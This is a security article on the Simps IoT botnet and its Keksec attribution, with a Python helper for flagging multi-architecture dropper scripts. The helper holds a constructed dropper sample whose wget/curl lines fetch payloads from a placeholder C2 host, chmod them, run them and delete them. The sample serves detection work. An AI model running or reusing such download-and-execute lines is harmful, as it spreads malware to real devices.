
Simps Botnet

A new botnet named Simps, built to carry out DDoS (Distributed Denial of Service) attacks, has been detected by infosec researchers. The attack chain that ultimately delivers the Simps payload to a compromised IoT (Internet of Things) device begins with a malicious shell script. The script downloads next-stage payloads built for several different *nix architectures, fetching them from the same Command-and-Control (C2, C&C) URL that served the shell script itself. The script can also change file permissions with chmod and delete selected payloads with rm. An alternate attack chain uses Gafgyt and exploits RCE (Remote Code Execution) vulnerabilities.
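The fetch / chmod / execute / rm fan-out described above is the trait an analyst can key on when triaging a suspicious shell script pulled from a router or camera. The following Python helper is an added example, not code from the original page or from the Simps operators: it splits a dropper script into simple commands, extracts download URLs and C2 hosts, guesses the target architecture from each payload's file name, and flags the script when several architectures are fetched, made executable, run and deleted. The two scripts it runs on are constructed samples; the host names use the reserved `.invalid` TLD and the file names are generic, so none of them is a real Simps indicator.

```python
"""Triage helper for multi-architecture IoT dropper shell scripts.

Added example, not code from the original page. It parses the
download / chmod / execute / rm pattern and extracts indicators.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set
from urllib.parse import urlparse

# Constructed sample in the style of an IoT dropper. The host is a
# placeholder (.invalid TLD) and the file names are generic; none of this
# is a real Simps indicator.
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://c2.example.invalid/bins/bot.x86 -O x86; chmod 777 x86; ./x86; rm -rf x86
wget http://c2.example.invalid/bins/bot.mips -O mips; chmod 777 mips; ./mips; rm -rf mips
wget http://c2.example.invalid/bins/bot.arm7 -O arm7; chmod +x arm7; ./arm7; rm -rf arm7
curl -s http://c2.example.invalid/bins/bot.arm5 > arm5; chmod +x arm5; ./arm5; rm -rf arm5
"""

# Constructed benign control: a single download with no per-architecture fan-out.
BENIGN_SCRIPT = """#!/bin/sh
wget https://updates.example.invalid/tool.tar.gz -O /tmp/tool.tar.gz && tar xzf /tmp/tool.tar.gz -C /opt
"""

FETCH_CMDS = {"wget", "curl", "tftp", "ftpget"}
URL_RE = re.compile(r"""https?://[^\s;"'|>]+""")
# Longer alternatives first so that x86_64 is not reported as x86.
ARCH_RE = re.compile(
    r"x86_64|x86|i[3-6]86|mipsel|mpsl|mips|aarch64|armv?\d*|powerpc|ppc|sh4|m68k|sparc"
)


@dataclass
class DropperReport:
    urls: List[str] = field(default_factory=list)          # every payload URL seen
    hosts: Set[str] = field(default_factory=set)           # C2 hosts serving payloads
    archs: Set[str] = field(default_factory=set)           # architectures guessed from file names
    counts: Dict[str, int] = field(
        default_factory=lambda: {"fetch": 0, "chmod": 0, "exec": 0, "rm": 0}
    )


def _commands(script: str):
    """Yield (first_word, text) for each simple command, splitting on ; && || and |."""
    for line in script.splitlines():
        if line.startswith("#!"):
            continue
        line = line.split("#", 1)[0]  # drop trailing comments
        for part in re.split(r"\s*(?:;|&&|\|\||\|)\s*", line):
            part = part.strip()
            if part:
                yield part.split()[0], part


def analyze_dropper(script: str) -> DropperReport:
    """Extract URLs, hosts and architectures and count each stage of the chain."""
    rep = DropperReport()
    for cmd, text in _commands(script):
        if cmd in FETCH_CMDS:
            rep.counts["fetch"] += 1
            for url in URL_RE.findall(text):
                rep.urls.append(url)
                host = urlparse(url).hostname
                if host:
                    rep.hosts.add(host)
                # The architecture is usually encoded in the payload's file name.
                m = ARCH_RE.search(url.rsplit("/", 1)[-1].lower())
                if m:
                    rep.archs.add(m.group(0))
        elif cmd == "chmod":
            rep.counts["chmod"] += 1
        elif cmd == "rm":
            rep.counts["rm"] += 1
        elif cmd.startswith("./"):
            rep.counts["exec"] += 1
    return rep


def is_multiarch_dropper(rep: DropperReport, min_archs: int = 3) -> bool:
    """Flag a script that fetches, marks executable, runs and removes payloads
    for several architectures; min_archs is a tunable threshold, not a fact
    from the page."""
    c = rep.counts
    return (len(rep.archs) >= min_archs and c["chmod"] > 0
            and c["exec"] > 0 and c["rm"] > 0)


if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_DROPPER), ("benign", BENIGN_SCRIPT)):
        r = analyze_dropper(script)
        verdict = "flagged" if is_multiarch_dropper(r) else "clean"
        print(name, verdict, sorted(r.archs), sorted(r.hosts))
```

The report's `urls` and `hosts` are the blocking indicators to hand to the network team, and the per-stage counts make the chmod and rm usage visible even when the payload names carry no architecture hint. The threshold of three architectures and the static architecture list are assumptions chosen for this example; tune both against the droppers seen in your own telemetry.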

The Simps Botnet is Attributed to the Keksec Group

The criminals behind the Simps botnet appear to have created their own YouTube channel and Discord server. The YouTube channel seems to be used to demonstrate the capabilities of the botnet and to promote it. It also contained a link to the Discord server, where infosec researchers found several discussions about various DDoS activities and different botnets. This led to the discovery of several links connecting the Simps botnet to the Keksec (Kek Security) hacker group. Keksec was previously known for operating HybridMQ-keksec, a DDoS Trojan based on the source code of Mirai and Gafgyt.
